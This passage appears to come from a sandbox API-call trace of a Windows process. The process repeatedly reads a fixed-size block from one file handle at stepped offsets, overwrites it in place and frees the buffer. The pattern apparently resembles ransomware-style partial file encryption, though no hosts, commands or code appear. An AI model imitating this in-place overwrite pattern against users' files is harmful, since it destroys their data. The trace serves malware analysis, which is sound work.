[0088.781] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.782] GetProcessHeap () returned 0x500000 [0088.782] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.782] GetProcessHeap () returned 0x500000 [0088.782] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.782] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x501bd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.782] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.795] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x501bd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.795] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.796] GetProcessHeap () returned 0x500000 [0088.796] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.796] GetProcessHeap () returned 0x500000 [0088.796] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.796] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x53ec60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.796] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.851] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x53ec60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.851] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.852] GetProcessHeap () returned 0x500000 [0088.852] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.852] GetProcessHeap () returned 0x500000 [0088.852] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.852] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x57bcf0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.852] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.860] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x57bcf0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.860] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.861] GetProcessHeap () returned 0x500000 [0088.861] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.861] GetProcessHeap () returned 0x500000 [0088.861] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.861] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5b8d80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.861] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.870] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5b8d80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.870] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.870] GetProcessHeap () returned 0x500000 [0088.870] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.870] GetProcessHeap () returned 0x500000 [0088.870] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.870] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5f5e10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.870] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.898] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5f5e10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.898] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.900] GetProcessHeap () returned 0x500000 [0088.900] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.900] GetProcessHeap () returned 0x500000 [0088.900] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.900] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x632ea0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.900] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.908] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x632ea0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.908] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.908] GetProcessHeap () returned 0x500000 [0088.908] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.908] GetProcessHeap () returned 0x500000 [0088.908] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.908] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x66ff30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.908] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.916] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x66ff30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.916] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.917] GetProcessHeap () returned 0x500000 [0088.917] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.917] GetProcessHeap () returned 0x500000 [0088.917] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.917] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6acfc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.917] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.925] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6acfc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.925] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.925] GetProcessHeap () returned 0x500000 [0088.925] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.925] GetProcessHeap () returned 0x500000 [0088.925] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.925] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6ea050, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.925] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.941] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6ea050, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.941] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.942] GetProcessHeap () returned 0x500000 [0088.942] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.942] GetProcessHeap () returned 0x500000 [0088.942] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.943] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7270e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.943] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.950] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7270e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.950] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.951] GetProcessHeap () returned 0x500000 [0088.951] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.951] GetProcessHeap () returned 0x500000 [0088.951] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.951] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x764170, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.951] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.958] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x764170, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.958] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.959] GetProcessHeap () returned 0x500000 [0088.959] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.959] GetProcessHeap () returned 0x500000 [0088.959] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.959] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7a1200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.959] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0088.968] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7a1200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.968] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0088.969] GetProcessHeap () returned 0x500000 [0088.969] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.969] GetProcessHeap () returned 0x500000 [0088.969] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0088.969] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7de290, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.969] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0089.060] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7de290, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.060] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0089.061] GetProcessHeap () returned 0x500000 [0089.061] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0089.061] GetProcessHeap () returned 0x500000 [0089.061] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0089.061] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x81b320, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.061] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0089.076] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x81b320, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.076] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0089.076] GetProcessHeap () returned 0x500000 [0089.076] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0089.076] GetProcessHeap () returned 0x500000 [0089.076] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0089.077] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8583b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.077] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0089.085] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8583b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.085] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0089.085] GetProcessHeap () returned 0x500000 [0089.085] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0089.085] GetProcessHeap () returned 0x500000 [0089.085] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0089.085] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x895440, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.085] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0089.093] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x895440, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.093] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0089.093] GetProcessHeap () returned 0x500000 [0089.093] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0089.094] GetProcessHeap () returned 0x500000 [0089.094] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0089.094] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8d24d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.094] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0089.103] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8d24d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.104] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0089.104] GetProcessHeap () returned 0x500000 [0089.104] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0089.104] GetProcessHeap () returned 0x500000 [0089.104] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0089.104] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x90f560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.105] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0089.118] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x90f560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.118] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0089.118] GetProcessHeap () returned 0x500000 [0089.118] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0089.118] GetProcessHeap () returned 0x500000 [0089.118] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0089.118] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x94c5f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.118] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0089.128] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x94c5f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.128] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0089.128] GetProcessHeap () returned 0x500000 [0089.128] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0089.128] GetProcessHeap () returned 0x500000 [0089.128] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0089.129] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x989680, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.129] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0089.137] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x989680, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.137] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0089.137] GetProcessHeap () returned 0x500000 [0089.137] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0089.138] GetProcessHeap () returned 0x500000 [0089.138] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0089.138] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9c6710, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.138] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0089.148] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9c6710, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.148] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0089.149] GetProcessHeap () returned 0x500000 [0089.149] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0089.149] GetProcessHeap () returned 0x500000 [0089.149] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0089.149] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xa037a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.149] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0089.162] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xa037a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.162] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0089.162] GetProcessHeap () returned 0x500000 [0089.162] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0089.162] GetProcessHeap () returned 0x500000 [0089.162] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0089.162] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xa40830, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.162] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0089.170] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xa40830, lpNewFilePointer=0x0, 